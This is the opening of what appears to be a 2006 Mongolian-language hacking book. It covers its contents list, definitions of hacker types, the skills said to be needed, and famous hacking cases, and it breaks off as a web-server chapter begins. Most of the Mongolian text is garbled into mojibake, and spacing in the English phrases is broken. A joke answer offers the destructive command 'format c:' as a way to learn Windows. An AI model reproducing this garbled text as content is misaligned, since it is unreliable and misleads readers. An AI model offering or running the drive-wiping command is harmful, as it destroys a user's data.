0

1
Omya XAPFAR
- XAKEP -
Xsuacau: Fauôaa:ap BºNBABOPX
HsMxvv NOHX-3PB3H3
3opnr: FAHBAT
Ynaaaõaa1ap xo1 2006 oa
2
Uaacub xaMxaa:
Xaanannüu xyyaac:
¨Ypnax apaaM" Xaanannüu koMnauna xaanaa.
Powered by ht t p: / / www.j argal.mn
3oxnorunüu apx xyynnap xaMraanaracau ôonuo. © 2006
3
Xspxsa asõ xyypac xaxeppparaãr Mspsxrvã õaãw saw
xaMraanax 1yxaã õopoop u xspsrrvã õasss...
4
5
- Yamarupap xaapaw xsnsx vr -
Ta auaxvv uoMuooc sax aaô xakepaaarnür Maacauaap eepnüu xnücau
aaô xyyacaa xapxau xakepayynaxaac xaMraanx ôonox :yxaü cypax
ôonoMx:oü kM. Baô xakepaax :yxaü Maanar ôon rauuxau uoMoua
ôar:axaaprvü nx ônnaa.
Taub yumnx ôyü uoM Mnunü auxub ôv:aan :yn anacau ouocou svünc
uanaaa ôaüraar yyunnx epmeex ôaüx xaMaau uaüaax ôaüua.
Nnunü onx Maacauaap nxaux uoM soxnoruna ônucau uoMuoocoo
Meureu amnr onaorrvü ôereea ôycaaa mnua Maanar Maaaanan erex rax
eepnüu uar saaaa xaüpnaxrvü sopnynaar ônnaa. Bycabu ônucau uoMbr
vuarvüraap ôycaaa :apaax, nu:epua:aa ôaüpnyyncau :oxnonaona uoM
soxnoruna xaanvvncau uoMoo ôopnyynx uaaaxrvüa xvpu ynMaap aapaa
aapaarnüu ôv:aanaa rapraxaa cauxvvrnüu xauvv ôaüaan:aü :ynrapaar
:yn apxaM :a xoümna vvunür oünrox, xvuaa:rau vsaxnür xvcax ôaüua.
3ua uoM us aaô xyyaac xapxau xakepaax, :vvuaac xapxau xaMraanax
:anaap auxau ôonou ayua ma:ub Maanar:aü xvua sopnyncau uoM ôonuo.
KoMnsk:epnüu akcnep:vvanüu xyasa xa: aurnüu cauaraax ôonox kM.
Xapnu koMnsk:epnüu :anaap or: Maanarrvü xvu vvunür yumaaa sMap uar
kM oünrouo rax ôn ôoaoxrvü ôaüua.
Nnunü uaaau saau aMxa:racau auaxvv ôv:aannür :aanau ôonroox
coëpxouo yy. Yumnru :a aua uoM:oü xonôoo:oü sMap uarau Maaaanan,
cauan xvcan:aa jargal_oyun@yahoo.de xasraap npvvnôan ôn :yünbu nx
ôasp:aü ôaüx ôonuo.
6
- Tanapxan -
XaMrnüu :vpvvua aux auaxvv uoMbr ônunxaa ypaM sopnr eru, ca:ran
cauaaraap aaMxcau aua uaüs uap:aa ôaspnanaa. HoM ônunx sauaa
vpranx :ycanx aaMxnx ôaücau rapnüuxauaaa ôaspnacau ca:ranaa aua
uoMoop aaMxyynau xvprax ôaüua.
3uaxvv uoMbr ônunx sauaa vua:aü seaneree erceu ¨Nou Aa" XXK-bu
ansaüuep C. Bascranau, K:NC-u ôarm Bok:op U. Fauôa:, K:NC-u axnax
uoMbu cauu B. Ouepxapran, ôonou aua uaüs N. Tvamnu:erc, B. Coaôasp,
uap: ôaspnacau :anapxcauaa nnapxnünse.
Neu aua uoMbr xyaanaau aau eep:ee ôara u a:yraü Maanar uaMax rax
ôaüraa :aua ôaspnanaa.
7
Fapuar
Opman ................................ ................................ .......................... 11
Bvnar 1. Xaxepyypma 1yxaã oãnron1 ................................ .......... 13
Xakep rax xau ôa? ................................ ........................ 15
Xakepyyabu aurnnan ................................ .................... 17
Kpakep rax xau ôa? ................................ ...................... 18
Xakepbu Maanar ................................ ........................... 18
Lnnaar 10 xakepaan: ................................ ................... 21
Bvnar 2. Bsõ cepaepaãa õv1su ................................ .................... 23
Baô cepaep ................................ ................................ ... 25
Baô ôpaysep ................................ ................................ . 28
Firewall ................................ ................................ ........ 29
HTTP ................................ ................................ ............ 29
HTTPS ................................ ................................ .......... 30
!P xasr ................................ ................................ ......... 30
DNS ................................ ................................ ............. 31
TCP ................................ ................................ .............. 32
FTP ................................ ................................ .............. 32
Tenue: ................................ ................................ ......... 33
Encrypt ion ................................ ................................ .... 34
I nt rusion Det ect ion Syst em ................................ ............ 37
Finger ................................ ................................ .......... 38
SSH ................................ ................................ .............. 39
SMTP ................................ ................................ ........... 39
POP3 ................................ ................................ ............ 39
NNTP ................................ ................................ ........... 40
SNMP ................................ ................................ ........... 40
ARP ................................ ................................ .............. 40
I CMP ................................ ................................ ............ 40
DHCP ................................ ................................ ........... 40
SSL ................................ ................................ .............. 41
TFTP ................................ ................................ ............ 41
Root kit ................................ ................................ ......... 41
Vulnerabilit ies, Threat s, Count ermeasures ...................... 42
8
Bvnar 3. Bsõ xaxeppax ................................ ................................ . 45
Baô xakepaax vuaac ................................ ...................... 47
XaMrnüu nx xananaraa ep:aer uvx ................................ 53
XaMrnüu nx xananaraa ep:aer nop:yya ......................... 54
Cepaep connx apra ................................ ....................... 54
Buf fer Overf lows ................................ ........................... 55
Format String anaaa ................................ ...................... 56
Baô xyyaacuaac uaa:pax apx xaüx ................................ . 57
UN!X cnc:eMnüu uyyu vr :aünax ................................ ... 60
Social engineering ................................ ......................... 62
Phishing ................................ ................................ ....... 63
1opMbu uyyu :anôap ................................ ................... 66
Samba amnrnax exploit xnüx ................................ ........ 66
Net BI OS NULL session ................................ ................... 69
HTTP xapnyn: eepunex ................................ ................. 71
DoS aaüpan: ................................ ................................ 73
Google hack ................................ ................................ .. 79
Cross Sit e Script ing (XSS) ................................ .............. 83
SQL inj ect ion ................................ ................................ 86
OS inj ect ion ................................ ................................ .. 86
HTTP post SOL query uaüpyynax ................................ ... 87
Yahoo XSS worm ................................ .......................... 91
Bvnar +. Pyt hon xsn ................................ ................................ ...... 95
Python xanunü :yxaü ................................ .................... 97
Yuacau xacar ................................ ................................ 97
Onepa:opyya ................................ ................................ 99
Hexuen manrax !F vünaan ................................ ............. 101
Hexuen: aaa:an: while vünaan ................................ ..... 102
For aaa:an: ................................ ................................ .. 102
Break vünaan ................................ ................................ 103
Cont inue vünaan ................................ ........................... 103
1yuku ................................ ................................ .......... 104
Noayns ................................ ................................ ........ 107
Orerannüu ôv:au ................................ .......................... 108
Xnmaa nporpaM ................................ ........................... 101
Oô¡ek: xauaan:a: nporpaMunan ................................ ... 111
YaaMmnn ................................ ................................ ...... 112
Opon: rapan: ................................ ............................... 113
9
Bvnar 5. Perl xsn ................................ ................................ ........... 115
Perl xanunü :yxaü ................................ ......................... 117
Orerannüu :epen ................................ ......................... 117
Onepa:opyya ................................ ................................ 120
Baa:an: ................................ ................................ ....... 125
1aünbu opon: rapan: ................................ .................. 126
Labels ................................ ................................ .......... 128
Subrout ine ................................ ................................ .... 129
Pat t ern mat ching ................................ .......................... 130
Noayns ................................ ................................ ........ 132
Oô¡ek: ................................ ................................ ......... 135
Orerannüu cau ................................ ............................. 137
Xaacpan1 ................................ ................................ ...................... 141
Hop:yya................................ ................................ ........ 143
Xakepbu nporpaM (t ools) ................................ .............. 151
Nouron yncbu apvvrnüu xyynnac ................................ .. 155
Amnrnacau Ma:epnan ................................ ................... 157
Torcron ................................ ................................ ........................ 159
10
11
- Opman -
Bna aua xaaap Nouron yncaa nu:epua: aux uaa:apcunü 10 xnnnüu
oür ëcnon :erenaep :aMaarnau eurepvvnnaa. UaxnM Nouron ôonou ôycaa
onou xe:enôep xaparxcauaap uar vea ôoaaon koMnsk:ep, nu:epua:nüu
au :ycbr oünrox Maaaar xvu onou ôonx ôaüraa us ôaspnyym:aü. Yvu:aü
saparuau nu:epua:, :ap ayuaaa Maaaannnüu :exuonornüu akynrvü
ôaüanbu :anaap spnxaac eep aprarvü ôereea, aua :an aaap :oaopxoü
ôaüryynnara xvMvvc spsx xanx onou axnn xnüx ôaüraa ôonoau vp avua
xvpu ôaüraa us cauacuaac ueexeu ôaüua.
Bvx koMnaun, ôaüryynnaryyabr aaô xyyaac:aü ôonrox :yxaü spsx
axancuaac xoüm eapeec eaep: onou aaô xyyaac mnuaap uaMaraax ôaüraa
us caüu u, xnücau aaônüuxaa akynrvü ôaüaan ôonou ansaüu :an aaap
auxaapyym:aü ôonooa ôaüua.
Nouron yncaa aaô xnüaar onou caüu c:yan, xyanapaa aaô xnüaar
onou aaô ansaüuepyya ôaüaar ôonoau xaM:apu uaraax axnnnax :an aaap
“ Myy” avu aacaap n ôaüua. Baô xyyaac xnüxnüu :yna aaô nporpaMnc:, aaô
ansaüuep, aunMeümu xnüru rax Ma: onou xvunü xaM:bu ôv:aan ôaüx
ëc:oü ôonoau Nourona ôvranür us uar xvu xnüunxaar us annaaa xvu
:yxaüu uar unrnanaaa Mapramnxaa us caaa ôonx ôaüx mnr. 3caan
Nouronuyyabu ôvranür uaaaar yunaepcans uauap:aü xonôoo:oü ôaüx u
ôonox kM.
Oaooroop aaô ansaüuepyyabu unü:nar apx amrnür xaMraanaar
ôaüryynnara uar u ôaüxrvü ôonon:oü. Nnunü ône ¨Baô Bnsaüuepyyabu
Xonôoo" rarunür ôaüryynax cauaar cvvnnüu xaaau xnn ao:poo :aacaap
ôaüraa ônnaa.
3apnM xvMvvc uaMaür aaô xakepaax :yxaü uoM raprax ôycaaa
xopno:oü Maaaanan uaunaa rax xanx Maraarvü n kM. Taraan ôn xapnya
us ¨3ua ôon xopno:oü Maaaanan ônmaa, aua ôon xvu ôvxunü Maaax ëc:oü
svünc kM. Xapnu aua Maanaraa caüu svüna sopnynax yy, Myy svüna
sopnynax yy raaar us :yxaüu xyas xvunü acyyaan." rax xanua. AMepnknüu
uaracau yncaa 12-1+ uacub xvvxavva nüM Maanarnür aaunxcau ôaüaar.
Yunp us raaan :aaaua :epenx xan aaap yumnx Ma:epnan us xauran::aü
nx ôaüaar:aü xonôoo:oü.
12
Ta ôvxau eMue us Maaaannnüu xaparcnvvaaap 12 uac:aü xvvxaa AHY-
u uarau ôauknür xakepaax eepnüu aaucaua xaaau cas aonnap xnüraaa
ôapnracaubr coucox ôaücau ôaüx. Onou xvMvvc :ap xvvxanür ¨PAF"
xaMaau :ooucou us naa:aü. Faau :ap xvvxanüu ¨PAF" raxaac nnvv onx
aaaar Maaaanan ônaunüxaac eep ôaüraar xapyynx ôaüua.
Taraan :nüM Maanar:aü xvvxavva uar n eaep uarau sapar Nouron
yncbu akynrvü ôaüanbu cnc:eM pyy xanaaan sax aa? Bna :vvunür ¨PAF"
xvvxavva xnücau raaa cyyx ôaüx yy???
Harau: n Nouron ync ôycaa ync opuooc Maaaannnüu :exuonornop
xoupoxrvü rax ôoaox ôaüraa ôon caüu Myy ôvxnü n svüncnür :aauaac
ay:axrvü cypu Maacau ôaüx maapanara:aü ôns. Tvpvvu aypacau :ap 12
uac:aü xvvxaa AHY-u ônm Nouron yncbu uar ôauk pyy xanacau ôon
ôapnraax ôaücau ôonoa yy?
Oaoo Mauaü 10 xnnnüu xvvxavva ayua caüu aaô xnüaar xvvxavva
ôaüua. 3apnM us Maraarvü aua uoMbr ¨xvvxanüu uoM" rax xanaxaap
euaep Maanar:aü ôaüraa ôaüx. TnüMaac ôna xoüu npaaavüuxaa Maanarnür
ôycaa opub xvvxavvanüu Maanaraac xoupoox ôonoxrvü aa.
Faxaaa auaaac us 10 xnnnüu xvvxavvaaa sopnyncau uoM rax oünrox
ôonoxrvü. 3ua uoM ôvx uacubxaua sopnyncau ôereea npaaavüu
koMnsk:epnüu syyu xvnaax ôaüxaa ôna ôanau ôaüxrvü ôon ôonoxrvü.
Neu vvunür yumaaa :a Nouron yncbr Xakeprvü rax ôoaox ôonoxrvü
mvv. Nouron ync Maaus aanxnüa aauc:aü xaaau Xakep:aü ôereea, Mam
caüu Mapramcau Cnc:eMnüu AaMnuyya u onou ôaüraa. 3araap ¨Caüu"
xaMaax anapbr xvp:ax uaaaxyüu onou Cnc:eMnüu AaMnu uaMaxaa ôara u
a:yraü :yc uaMap ôonox ôaüx xaMaau auaxvv uoMbr ônunaa.
13
6vnsr 1
Xakepyyabu :yxaü oünron:
“ I f you know t he enemy and know yourself, you need not fear t he
result of a hundred bat t les”
- Sun Tzu
14
15
- Xaxep rsw xsa õs? -
Xakepyya ôon koMnsk:epnüu cnc:eM aax anaaa, uyyunannür
counpxou cyaanaar xvMvvc kM. Tvvunür nnvv caüxpyynx xaMraanax apra
saMbr vpranx apanxnünax ayp:aü ôaüaar. Xakepyya Hu:epua:nür
eprexvvnx, UNI X vünannüu cnc:eMnür oaoo ônaunü xaparnax ôaüraa
xvp:an xerxvvncau kM.
Heree :anaap aaôa (cnc:eMa) seameepenrvü uaa:paxnür xakepaax
rax oünrox ôonuo. Onou xvMvvc Xakepyyabr caüu xvMvvc Kpakepyyabr
Myy xvMvvc rax oünroaor us :amaa oünron: kM. Xakepyya sapnMaaa
kpakepyyaaacaa u nnvv Myy svünnür xnüx us anôar ôaüaar. ºaraaa raaan
Maanarnüu xyasa Xakepyya us xasaaa Kpakepyyaaac nnvv ôereea xapaa
uarau: n nnvv Maanar:aü kM unus :ap Maanaraa Myy svüna sapaan saxbr
:a oünrox ôaüraa ôaüx. Xapnu Kpakepyya ôon xasaaa Myy xvMvvc ôaüaar
rax oünroxoa uar nx ôypyyaaxrvü aa.
HoMbu uvvpau aaap ôaüraa syprbr xapcau ôaüx, ky ôonoxbr us :a
Maaax vv? Linux nnuranunü sypar:aü aMôneM:aü ôaüaar ôon, FreeBSD
ue:repnüu sypar ôvxnü aMôneM:aü ôaüaar. Taraan Xakepyyaaa aMôneM
ônü ky?
3ua aMôneMnür 2003 oub 10 capaac xaparnax axancau. 3ua :aua
aoopx avpcvvanür :aascau ôaüaan, :a Xakepyyabu aMôneM rax oünrox
xapar:aü ôonox us. Xapnu xau uarunü koMnsk:epnür Xakepaunxaaa
aoopx aMôneMnür :aanxbr xopnrnoaor. Kpakepyyaaa sopnynaarvü racau
vr n aaa. Xapaa aua aMôneMnür amnrnax ôon aapaax caü:aac myya aaaaa
xaparnax ôonuo. ht t p: / / www.cat b.org/ hacker-emblem/ glider.png
3urnüu :ekc: xanôapaap ônunx :oxnonaona aoopx ôaüanyyaaap
ônuaar.
| _| 0| _| [ ] [ * ] [ ] [ ] [ 0] [ ] 0 1 0
| _| _| 0| [ ] [ ] [ * ] [ ] [ ] [ 0] 0 0 1
| 0| 0| 0| [ * ] [ * ] [ * ] [ 0] [ 0] [ 0] 1 1 1
Xakepbr sax :aunx aa? XaMrnüu caüu Xakep xau ôa? rax xvMvvc
aauaaa n acyyaar. Nnunü ôoanoop xaMrnüu ¨Caüu" Cnc:eMnüu AaMnu
ôon XaMrnüu ¨Caüu" Xakep. ºaraaa raaan Cnc:eMnüu AaMnuyya eepcanüu
xnücau kMaa xakepayynaxrvüu :yna eepee eepnüuxee cnc:eMnüu anaaar
xaüaar. Tarcaap ôaüraaa ¨Caüu" xakep ôonunxaor. Faxaaa ôycaa xvMvvc
¨Caüu" Xakep rax spsaarrvü ôereea ¨Elite Hacker" rax uapnax saumxaa.
16
ºax "3nn: Xakep" ôonox aa? racau acyyn:aua ôn aapaax mvnrnür
sopnyn¡s.
To f ollow t he pat h:
Look t o t he mast er,
follow t he mast er,
walk wit h t he mast er,
see t hrough t he mast er,
become t he mast er.
3ua mvnrnür ôn cauaa:aüraap opuyynanrvü :aascau ôereea xapaa
Xakep ôon¡ë n rax ôoaox ôaüraa ôon Aurnn xanunü Maanar ¨Java”
nporpaMunanbu xanunü Maanaraac nnvv uyxan raarnür xanax racau kM.
Neu Xakepyyabu aMôneMaac raaua Xakepbu ôar ôvp eepnüu noro
sypar:aü ôaüaar. Baô xakepaaaa aapaa us eepnüu aMôneMaa :aascuaap
xau xakepacaubr us :ausx, :vvunü pe:nur ecex ôonuo. Onnoo.NH raaar
caü:br Maaaxrvü Nouron xvu ôaüxrvü rax ôoaox ôaüua, :vvunür
Xakepacau Typkbu ôar eepcanüu noro sypraa vnaaacau ôaücubr us
counpxyyn¡s. 3aaaan noro sypar u ran:rvü rapbu vcar ôyky sMap uar
:aunx :aMarnür :or:Mon vnaaaaar Xakepyya ôaüaar.
17
¨Xvu axnaaa aaaax cypaar, aapaa us sacax cypaar" racau uar vr
ôaüaar. Baônür xakepaax rax ôaüraa xvu aoa:onrooub rauu n apra
Maaaar ôaüxaa xauran::aü ôon xapnu aaôaa xakepayynaxaac xaMraanx
ôaüraa xvu ôvx aprbr Maaaar ôaüx xapar:aü ôaüaar. HüMaac ¨Caüu"
Cnc:eMnüu AaMnunc:pa:op ôonoxoa xap nx xeaenMep opox us xaparaax
ôaüraa ôaüx.
Bn:rnü mau:paapaü, ôn:rnü sanxyypaapaü!
- Xaxepyypma aaranan -
Xakepyyabr ao:op us Uaraau Xakep (White hat), Caapan Xakep(Grey),
Xap Xakep (Black hat) rax 3 aurnnaar ôereea saraaa nurax aurnnax
ôoncubr :aünôapnas.
Uaraaa Xaxep: Caüu cauaa: xakep rax oünrox ôonuo. Xapaa
Uaraau Xakep aaôaac (cnc:eMaac) sMap uar anaaa ôyky uvx onôon aua
:yxaüraa :yxaüu aaônüu AaMnua us Maaaraax sacyynax ôyky eepee
sacax aprbr us xanx eraer. Uaraau Xakepyya us Xap Xakepyya:aü sr
aannxau nporpaM xaparnax ôonoau :aa daünbr yc:rax, sMap uar
Maaaanan xynraünax sopnnroop amnrnaaarrvü.
Xap Xaxep: Hapuaac us xapaaa n :a myya oünrox ôaüraa ôaüx.
Toauxouaoo ôon Uaraau Xakepbu sr acpar us. Xvunü kMaua uaa:apu
opooa yc:rax, syraaraa raprax saaar xvMvvc.
Caapan Xaxep: Baapx xoëpooc ans annubx us mnux uauapbr
aryyncau xvMvvc. Xaasa yc:raaa n xaasa sacaaa n. Hxaux Xakepyya aua
:epena opaor.
Newbi e: Xapaa :a aeurex mnuaap cypu axanx ôaüraa ôon :aua aua
uapnür erex us aaa.
Baap us ôac uar Xakepbu :epen ôaüaar us Script Kiddies ôyky Script
Weenies kM. 3araap us xakepaax :anaap sMap u Maanarrvü ôaüx ôonox
ôereea Xakepyyabu xnücau ôanau nporpaMyyabr (tools) amnrnaaa eepee
u Maaanrvü xakepaunx :oxnonaon ôaüaar.
18
- Kpaxep rsw xsa õs? -
Kpakepyya (Cracker) ôon Xakepbu Maanaraa Myy svüna xaparnax
ôycabu koMnsk:ep: uaa:pax, yc:rax acaan cvnxaar xop: Myy cauaaub
vvauaac amnrnaaar xvMvvc kM. Faxaaa Nouron yncbu uexuena oaooroop
Kpakepyya ôysu ôonx ôaüua. ºaraaa raaan Nouronuyya ônaaua Nicrosoft
Office, Nicrosoft Windows XP sapar nporpaMbr opnruan xyannôapbr
xyaanaax aaax Meure ôaüxrvü yupaac, 1 CD ônunx vua ôyky 1500-3000
:erpereep onx aaaxaa :yc ôonx ôaüraa kM. Xnmaa us: AutoCAD
nporpaM aux rapaxaaa 2000 $ ôaücau. Bna 2000 aonnapaap uar CD xasaa
u aau xvupaxrvü, :araaa Meure xvpaxrvü kM unus raaa AutoCAD
nporpaMbr xaparnaxrvü ôaün:aü ônm aaa. HüMa vea n ueree Kpakepyya
:yc ôonx ôaüraa kM n aaa.
Xaanü :yc ôonx ôaüraa u Kpakepyya ôon Myy xvMvvc kM. Xvunü
xnücau ôv:aannür vua uauarvü ôonroaor, soxnorunüu apxnür xaMrnüu nx
sepuaer xvMvvc. HüMa Nouronbu nporpaMnc:yyabu xnücau ôv:aannür
ôn:rnü n kpakaax vsaapaü. Yrnüu Nouronuyya vua:aü nporpaM xyaanaax
aau cypaarvü xvMvvc yupaac xnuxaua vuaap us oaoo n xyaanaax aau
cypax xapar:aü ôaüua. Yrvü ôon ueree Nouron yncbu Naaaannnüu
:exuonornüu npaaavü rax Msura spnaa u uaMaprvü mvv.
Aux Speaker koMnaunü rapracau ¨Auryyu" nporpaMbr /0 Msura opunM
:erpereep sapaxaa sMap vua:aü kM ôa raaa onou xvMvvc ôyxnMaax
xvnaax aacau. HporpaM xnüxaa xnuuaau nx xvu xeaenMep, Meure oparnür
Maaaxrvüraac n :ap. Oaoo xvMvvcnüu ca:ranraa apaü n aaap ôoncou mnr
cauaraax ôaüua.
- Xaxepma Mspnsr -
3ua uoMoua aaô xyyacbr sMap apraap, xapxau xakepaaar :yxaü
:vvuaac xapxau xaMraanx ôonox :yxaü aurnüuaap :aünôapnaxbr sopscou
ôonuo. 3araap apryyabu :yxaü uapnüaunau saaxrvü ôereea seaxeu ky
aa? raarnür us n :aünôapnaaa opxnx ôonuo. Xakep ôonoxoop cypu
axnaxaa uacub xssraap rax ôaüxrvü ôereea :aub aassac, xeaenMep
xoëpooc unus ron us man:raanua.
Nam onou :epnnüu nporpaMyya (tools) ôaüaar ôereea aaraapnür aux
cnc:eMnüuxaa anaaar xsuax sopnnro:oü ôv:aaaar ôa annaaa kMbr caüu
Myyrnüu annuaap us u amnrnax ôonarnüu :oa xnmaa kM.
19
Faxaaa ôycaa xvunü ônucau ôanau nporpaM amnrnax ôaüraa xvu :ap
nporpaMbr ônucau xvuaac sMar: uar ôonou uanaaa anxMbu xoüuo saaar
raarnür cauax xapar:aü. HüMa ao:op us ky ôonooa ôaüraar caüu Maaax
ôaüaan npaaavüa uaMa eep: unus n xapar ôonuo.
Xakep ôonoxbu :yna aapaax svüncnür saünmrvü Maaaar ôaüx ëc:oü.
1. Xapaa sMap uar nporpaMunanbu xan Maaaxrvü ôon Python xanuaac
axnax xapar:aü. Bapaarnüu cypax xan ôon C ôonou C++ xan,
Python xanuaac nnvv uaaaapnar ôereea cypaxaa u raürvü. 3ua
ôon seaxeu vuacau manryyp ôereea xapaa caüu xakep ôon¡ë
raaan nporpaMunanbu onou xan Maaaar ôaüx xapar:aü. C aooa
:vamunü yupaac uaauaa sr ky xnüraaa ôaüraa us xaparaaar.
Xapnu Java aaap uaauaa ky ôonooa ôaüraa us u Maaaraaarrvü.
Heeuenceu saüraa xvp:an yc:racau vrvü us Maaaraaarrvü xan mvv
aaa. Faxaaa nporpaM ônunxaa nnvv xypaau yupaac cypaxaa
nnvvaaxrvü. C/C++ xannür caüu Maaaar xvua ôon aaraap
xanuvvanür cypaxaa xaa xouornüu n axnn ôonox ôaüx. Neu
Xakepyyabu cypax uar xan ôon L!SP nporpaMunanbu xan kM.
2. UNI X vünannüu cnc:eMnüu vuaac. Ep us ôon Windows, Linux
xoëpbr uar sapar koMnsk:ep aaapaa cyynraaa cypanuaaa ôaü.
Neu Linux xaparnaruanüu xonôoo aua :apa ancaan ôvp u svraap.
3. Bac uar cypax ëc:oü xan ôaüraa, raxaaa nporpaMunanbu xan ônm
mvv. Onou yncbu xan English. Faxaaa Opoc kMyy FepMau xanunü
ans uarnür Maaaar ôaüxaa svraap. 3araap xan aaap Xakepbu
:yxaü uoM, dopyMyya seuaee ôaüraa.
4. TCP/ I P sax axnnarnür Maaaar ôaüx saünmrvü maapanara:aü.
5. Hu:epua:nüu vuaac, :vvu aaapx sus ôvpnüu vünunnraauvva.
(DNS, FTP, HTTP, SSH, Telnet rax Ma:)
6. XaMraanan:bu :anaapx ôara sapar Maanar. (Firewall, Proxies,
Packetfilter rax Ma:)
7. XaMrnüu cvvnunüu xapar:aü svün ôon Xakepbu ca:raxvü.
Xaasa uar Underground Warez Forum-yyaaap sounnx ôaüraapaü.
¨Ournpoo carcyy xvu onnr:oü Xakep ôonaorrvü." rax 3nn: Xakepyya
20
xanaar kM ôaüua naa. Xvunü auxaapan xasaa u ôn:rnü :a:ax ôaü racau vr
ôaüx ôonox kM.
¬n vuaxaap caüu Xakep ôonoxoop mnüacau ôon aapaax svüncnür
Maaax xapar:aü: visual Basic 8 visual Basic .NET, vBScript, ASP, ActiveX
nporpaMunan, OCX ôa DLL kou:pon, HTNL (aaô sax xnüaar :yxaü),
JavaScript, PERL, Batch nporpaM (DOS opuub nporpaM), PHP, Shell Script.
Bac eepnüu racau Remote Admin Tools (RATs) xapar:aü. Neu nop: xasr,
I P-r Maaaar ôonox xapar:aü. Proxy cypax xapar:aü, sax anonymous ôaüx
:yxaü. FTP, Telnet, encryption, xoëp:bu :oonnbu cnc:eM, apaau
sypraa:bu :oonnbu cnc:eM, ASC!!, Unicode, Xam-nüu :yxaü kyua, sax
amnrnaaar :yxaü.
Pyt hon, Perl xanunü :yxaü aua uoMoua vsax ôonuo. Xapnu Java,
C/ C+ + xanunü :yxaü Nouron xan aaapx uoM ôaüaar ôereea :ap uoMyyabr
onx cypanuaapaü.
3ua uoMbr yumnx ayycaaa :a vuaxaap Xakep ôonoxoop mnüacau ôon
uaMx raaaaa xan aaapx Ma:epnanyyabr onx yumnx xapar:aü. Xapaa :a
Meureunü ôonoMx:oü ôon Certified Ethical Hacker rax Ma: cypran:aua
cypanuax ôac ôonox kM. Whit e Hat ôonox us Black Hat ôonoxoocoo apaü
xauvv u ôaüx ôonox kM. TnüMaac Black Hat , Whit e Hat xoëp saMbu ans
us ôonox mnüaaapaa caüu ôoaox ôaüx xnüraapaü.
Xakepyya vpranx Windows cnc:eMnür roounnx ôaüaar. ºaraaa raarnür
ôypxau n Maaax ôaüx. 3ua :yxaü uar nüM ounroo ôaüaar kM.
Har xvu ôypxuaac kM acyyx n aaa.
- Bn Windows xaparnaaar kMaa, ra:an uar kM ôonoxrvü ôaüx mnr
ôaüua, :a uaaaa vvunür apranaar uar vr saax ereeu? rax n aaa.
Bypxau xapnya us:
- “ format c: " 3ua ôvx acyyanbr unus soxnuyynua.
21
- Uanpsr 10 xaxeppan1 -
Tvvxau uar xyrauaaub :ypmna xakepyyabu xnücau axnyyaaac
xaMrnüu mnnaar ôoncou apabr us :aunnuyynx ôaüua.
1990 oub vea Xakepyyabu auar u rax sapnMaaa xanaraaar Kevin
Nitnick aanxnüu mnnaar xapnnuaa xonôooub koMnaunya ôonox Nokia,
Fuj it su, Mot orola, Sun Microsyst ems-nüu cnc:eMnür aaacau. Tapaap 1995
oua Xonôooub Mepaex :oauoo ( FBI ) -a ôapnraaaa 2000 oua
xyrauaauaacaa eMue cynnaracau. Faxaaa :ap eepnüree Xakep rax
uapnaxnür xvcax ôaücaurvü.
Gary McKinnon AMepnknüu uaprnüu uyyu Maaaanan ôvxnü 90 rapyü
koMnsk:ep nvv xanacau xapraap 2002 oub 11 capa Hx Bpn:auna
ôapnaunaracau. Tvvxaua xaMrnüu :oM uaprnüu koMnsk:epnüu Xakep rax
ônunracau xvu.
1995 Opocbu koMnsk:epnüu akcnep: BnaanMnp Peanu xaMrnüu aux
ounaüuaap ôauk aaapaMacau xvu kM. Cit ibank-aac 10 cas aonnap
xynraüncau ôonoau I nt erpol :vvunür AHY, 1nunaua, Fonnaua, FepMau,
Hspanns pyy Meuree mnnxvvncunü aapaa Hx Bpn:aunac ôapnaunncau.
Oaoo ôauknür ¨ounaüuaap aaapaMaax" xapar onou rapaar ôonoau sr
Meuree rap aaapaa aaax veaaa nxaux us ôapnraaar rax spsaar ôonoau
ôapnraaarvü xvu xaa u ôaüraa kM ônnaa, xau Maanaa.
1990 oua Poc Auxenocbu paano c:auuaac uarau ypanaaau sapnaxaa.
ºr 102 aaxs sanracau xvua uoo mnua Porsche 944S2 erue racau ôaüua.
Fa:an Kevin Poulsen xo:bu :enedou spnaub cnc:eMnür rap:aa aaaaa,
eepee 102 aaxs oponuoru ôonx opooa maruanbr aauaa. Tapaap :yxaüu
ouaoo ôapnraaaa 3 xnn mopoua cyyxaa.
1983 oua eueex Kevin Poulsen Maaus cyparu ôaüxaaa uvx onx,
nu:epua:aac ApnaHe:nür xakepaxaa.
AMepnknüu Xakep Timothy Lloyd Omega Engineeriing koMnaunü
koMnsk:epnüu cvnxaaua eepnüu xnxnr nporpaMaa cyynraxaa. Tap vea
Omega Engineeriing Nasa ôonou AMepnknüu :aurncnüu uaprnüu epeuxnü
xauraru ôaücau. Tap nporpaM ¨logic bomb" ôaücau ôereea sr :ap vea
axnnnax ôaücau Omega-rnüu ôvx axnnnax ôaücau nporpaMbr yc:rax
10 cas aonnapbu xoxnpon yupyynxaa.
22
1988 oua 23 uac:aü Robert Morris auxub nu:epua: e:nür aanxnüa
:apaaxaa. 99 Mep nporpaM us nu:epua:aa :aascau :ypmnn: ôaücau
ôonoau uaamaaraa ôycabu koMnsk:ep: xanaax axanxaa.
1999 oua Meliissa anpyc us aanxnü aaxnua +00 cas aonnapbu
xoxnpon yupyyncau kM. XaMrnüu nx xoxnpon yupyyncau anpycnür David
Smit h ônucau ôereea :apaap 5 xnnnüu sn aacau ôaüua.
2000 oub 2 capbu 6 ôonou Baneu:nub ôaspaap Nafiaboy aanxnüu
:oMooxou aaô caü: ôonox eBay, Amazon, Yahoo, CNN rax Ma: caü:yyabr
Denial of Service apraap xakepaax 1,/ :apôyM aonnapbu xoxnpon
yupyynxaa. 3ua aprbu :yxaü aapaarnüu ôvnrvvaaapaa vsax ôonuo.
Xnuxaua uapnür us unü:aa sapnaarvü ôereea yunp us :ap 15 uac:aü
ôaücau ôaüua. Tap 2000 ouaoo ôapnracau. 2005 oub 9 capbu 21-c :apaap
Nou:peanbu counua nu:epua:nüu akynrvü ôaüanbu :anaap unü:anaar
ca:rvvnuaap opcou ôaüua.
1993 ou. Taaunür xyypan:bu Mac:ep raaar ôereea aaüpax ôaü us
AMepeknüu y:acub cnc:eM ôaücau. Taa Yuaacunü Akynrvü ôaüanbu
anôa, AT&T, AMepnknüu ôauk rax Ma: ôaüryynnarbr xakepacau.
23
- 6vnsr 2 -
Baô cepaepnüu ôv:au
“ I f you want t o st op hackers from invading your net work, first
you’ve got t o invade t heir minds.”
24
25
- Bsõ cepaep -
3urnüuaap :oaopxoünx xanôan: Xaparnarunüu aaô xyyaac vsax
uexuennür xauraaar nporpaM ôa koMnsk:epnür us aaô cepaep raua.
XaMrnüu epreu amnrnaraaar cepaep ôon Apache, !!S ôyky !nternet
